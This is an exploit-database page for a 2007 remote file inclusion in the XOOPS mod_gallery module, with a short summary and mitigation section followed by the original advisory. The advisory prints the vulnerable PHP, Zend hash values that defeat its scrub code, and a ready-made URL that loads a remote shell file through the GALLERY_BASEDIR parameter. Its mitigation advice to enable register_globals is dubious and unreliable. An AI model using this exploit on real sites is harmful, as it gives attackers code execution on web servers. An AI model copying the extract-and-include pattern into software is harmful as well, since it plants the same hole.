header-logo
Suggest Exploit
vendor:
mod_gallery
by:
Eugene Minaev
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
CWE
Product Name: mod_gallery
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

XOOPS mod_gallery Zend_Hash_key + Extract RFI

The XOOPS mod_gallery module is vulnerable to a remote file inclusion (RFI) attack. This vulnerability occurs when the application fails to properly sanitize user-supplied input, allowing an attacker to include a remote file from a malicious server. The vulnerability can be exploited when the register_globals setting is turned off. The vulnerability is caused by the insecure handling of user-supplied input in the GALLERY_BASEDIR parameter. An attacker can manipulate this parameter to include a remote file, resulting in arbitrary code execution on the server. The vulnerability was discovered by Eugene Minaev of ITDefence.ru.

Mitigation:

To mitigate this vulnerability, it is recommended to update the XOOPS mod_gallery module to a patched version that properly sanitizes user-supplied input. Additionally, enabling the register_globals setting or using a web application firewall can help prevent this type of attack.
Source

Exploit-DB raw data:

----[ XOOPS mod_gallery Zend_Hash_key + Extract RFI ... ITDefence.ru Antichat.ru ]

						XOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
		 
		
		Bug works only with register_globals = OFF . I find their security fix very fun , and you ? : )
		
		<?php
		/* Begin Security Fix */
		$scrubList = array('HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_POST_FILES');
		foreach ($scrubList as $outer) 
		{
			foreach ($scrubList as $inner) 
			{
				if (isset(${$outer}[$inner])) 
				{
					unset(${$outer}[$inner]);
				}
			}
		}  
		....some php code...
		/* End Security Fix */
		extract($_GET);
		extract($_POST);
		extract($_COOKIE);  
		?>
		
		Hah .. very serious security fix , yeah  :) 
		
		<?php
		if (substr(PHP_OS, 0, 3) == 'WIN') {
		require_once($GALLERY_BASEDIR . "platform/fs_win32.php");
		} else {
		require_once($GALLERY_BASEDIR . "platform/fs_unix.php");
		} 
		?>
		
		zend_hash_key_calc.exe GALLERY_BASEDIR
		
		GALLERY_BASEDIR
		PHP5 hash: -2093085906
		PHP4 hash: -995617320
		
		test.ru/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://path/to/m0nzt3r_shell.txt?&2093085906=1&995617320=2
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]

Navigation

Suggest Exploit

Services By CQR